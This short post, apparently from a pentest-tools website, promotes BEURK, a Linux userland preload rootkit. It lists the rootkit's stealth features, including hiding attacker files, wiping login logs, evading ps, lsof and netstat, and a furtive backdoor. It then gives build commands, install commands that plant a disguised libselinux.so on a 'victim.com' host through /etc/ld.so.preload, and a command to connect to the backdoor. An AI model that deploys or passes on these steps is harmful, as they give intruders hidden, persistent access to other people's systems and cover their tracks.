Pentest Tools
Published on April 23rd, 2017 📆 | 8453 Views ⚑
0BEURK – Linux Userland Preload Rootkit
Text to Speech
BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
Being a userland rootkit it gives limited privileges (whatever the user has basically) vs a superuser or root level rootkit.
Features
- Hide attacker files and directories
- Realtime log cleanup (on utmp/wtmp)
- Anti process and login detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
Usage
Compile
1
2
3
|
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
|
Install
1
2
|
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
|
Enjoy !
1
|
./client.py victim_ip:port # connect with furtive backdoor
|
Dependencies
The following packages are not required in order to build BEURK at the moment:
- libpcap – to avoid local sniffing
- libpam – for local PAM backdoor
- libssl – for encrypted backdoor connection
You can download BEURK here:
Or read more here.
Gloss